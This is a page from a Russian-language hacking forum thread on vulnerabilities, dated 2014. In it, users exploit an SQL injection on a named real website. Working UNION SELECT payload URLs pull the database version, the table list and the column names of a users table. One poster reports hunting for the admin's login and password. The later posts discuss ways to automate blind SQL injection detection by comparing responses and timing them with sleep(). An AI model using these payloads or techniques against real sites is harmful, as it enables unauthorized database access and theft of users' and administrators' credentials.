HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 2384 из 2438 « Первая < 13841884228423342374 2380 2381 2382 2383 2384 2385 2386 2387 2388 23942434 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #23831  
Старый 13.10.2014, 22:31
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию
забавный случай. ответ отдается в редиректе, то есть при запросе

Код:
Code:
http://bitptc.com/recommends/?id=-5+union+select+1,version(),3--+
получим ответ в редиректе с версией
 
Ответить с цитированием

  #23832  
Старый 13.10.2014, 22:32
er9j6@
Guest
Сообщений: n/a
Провел на форуме:
107835

Репутация: 23
По умолчанию
Цитата:
Сообщение от faza02  
faza02 said:
забавный случай. ответ отдается в редиректе, то есть при запросе
Код:
Code:
http://bitptc.com/recommends/?id=-5+union+select+1,version(),3--+
получим ответ в редиректе с версией

все правильно, но таблицы вывести не получится, прав не хватит
 
Ответить с цитированием

  #23833  
Старый 14.10.2014, 00:15
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию
есть там всё

Код:
Code:
http://bitptc.com/recommends/?id=-5+union+select+1,/*!table_name*/,3+from+information_schema.tables--+
 
Ответить с цитированием

  #23834  
Старый 14.10.2014, 01:06
madam
Guest
Сообщений: n/a
Провел на форуме:
50513

Репутация: 1
По умолчанию
блин((

а как теперь из таблицы например microfaucet_users вывести имена столбцов?
 
Ответить с цитированием

  #23835  
Старый 14.10.2014, 02:11
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию
Цитата:
Сообщение от madam  
madam said:
блин((
а как теперь из таблицы например microfaucet_users вывести имена столбцов?
Код:
Code:
http://bitptc.com/recommends/?id=-5+union+select+1,/*!column_name*/,3+from+information_schema.columns+where+/*!table_name*/=0x6d6963726f6661756365745f7573657273--+
 
Ответить с цитированием

  #23836  
Старый 15.10.2014, 12:29
madam
Guest
Сообщений: n/a
Провел на форуме:
50513

Репутация: 1
По умолчанию
Цитата:
Сообщение от faza02  
faza02 said:
Код:
Code:
http://bitptc.com/recommends/?id=-5+union+select+1,/*!column_name*/,3+from+information_schema.columns+where+/*!table_name*/=0x6d6963726f6661756365745f7573657273--+
спасибо)) только логин и пасс админа всё равно не нашла(( видать в конфиге спрятал))
 
Ответить с цитированием

  #23837  
Старый 22.10.2014, 23:35
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию
какие возможные алгоритмы для определния sqli? то, что пришло в голову:

берем уязвимый параметр, подставляем в параметр сначала id=5+and+1=1-- и сравниваем размер страницы (или diff) с первоначальной (id=5). если результат одинаковый, то id=5+and+1=2-- и также сравниваем с размером исходной страницы. ваши идеи? что делать в случае, если на странице рандомно генерируемые объекты?
 
Ответить с цитированием

  #23838  
Старый 22.10.2014, 23:38
OxoTnik
Guest
Сообщений: n/a
Провел на форуме:
290351

Репутация: 173
По умолчанию
Цитата:
Сообщение от faza02  
faza02 said:
какие возможные алгоритмы для определния sqli? то, что пришло в голову:
берем уязвимый параметр, подставляем в параметр сначала id=5+and+1=1-- и сравниваем размер страницы (или diff) с первоначальной (id=5). если результат одинаковый, то id=5+and+1=2-- и также сравниваем с размером исходной страницы. ваши идеи? что делать в случае, если на странице рандомно генерируемые объекты?
иногда тупо order by помогает определить уязвимость
 
Ответить с цитированием

  #23839  
Старый 22.10.2014, 23:51
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию
это ты глазами увидишь, а как быть с автоматизацией? вомзожен такой вариант, что размер страницы особо не поменяется (пара кб или меньше)
 
Ответить с цитированием

  #23840  
Старый 23.10.2014, 00:42
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию
Цитата:
Сообщение от faza02  
faza02 said:
это ты глазами увидишь, а как быть с автоматизацией? вомзожен такой вариант, что размер страницы особо не поменяется (пара кб или меньше)
Как вариант можно рассмотреть через sleep(), как то на практике встречалась уязвимость, которая генерировала координаты на картинке, само тело страници не менялось, зато менялся вес картинки, пришлось писать скрипт для автоматизации скули где вес картинки больше n-го размера, там true.
 
Ответить с цитированием
Ответ
Страница 2384 из 2438 « Первая < 13841884228423342374 2380 2381 2382 2383 2384 2385 2386 2387 2388 23942434 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ